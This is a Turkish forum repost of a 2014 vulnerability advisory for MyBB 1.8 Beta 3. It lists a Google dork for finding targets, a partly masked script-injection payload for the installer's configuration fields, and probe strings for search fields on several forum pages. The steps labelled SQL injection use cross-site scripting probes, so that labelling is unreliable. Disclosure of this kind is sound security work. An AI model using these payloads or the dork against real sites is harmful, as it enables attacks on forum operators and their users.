İPUCU

Seçenekler

MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı

23-12-2014 13:17
#1
serverbedi - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2014
Mesajlar:
353
Teşekkür (Etti):
16
Teşekkür (Aldı):
31
Konular:
85
Ticaret:
(0) %
MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı



# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: MyBB - Free and Open Source Forum Software
# Software Link: Redirecting
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org
************************************************** *
a) Cross Site Scripting in Installation Wizard ( Board Configuration )
Fill -Forum Name, Website Name, Website URL- with your code, for example - ">**********alert('DemoLisH')</script>localhost/install/index.php
Now let's finish setup and go to the homepage.


b) SQL Injection in Private Messages ( User CP )
Go to -> Inbox, for example:localhost/private.php
Search at the following code Keywords:<foo> <h1> ********** alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


c) SQL Injection in Showthread
Go to -> Show Thread, for example:localhost/showthread.php?tid=1
Search at the following code Keywords:<foo> <h1> ********** alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


d) SQL Injection in Search
Go to -> Search, for example:localhost/search.php
Search at the following code Keywords:<foo> <h1> ********** alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


e) SQL Injection in Help ********s
Go to -> Help ********s, for example:localhost/misc.php?action=help
Search at the following code Keywords:<foo> <h1> ********** alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


f) SQL Injection in Forum Display
Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2
Search at the following code "Search this Forum":<foo> <h1> ********** alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


alıntı :MyBB 1.8 Beta 3 - Multiple Vulnerabilities


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı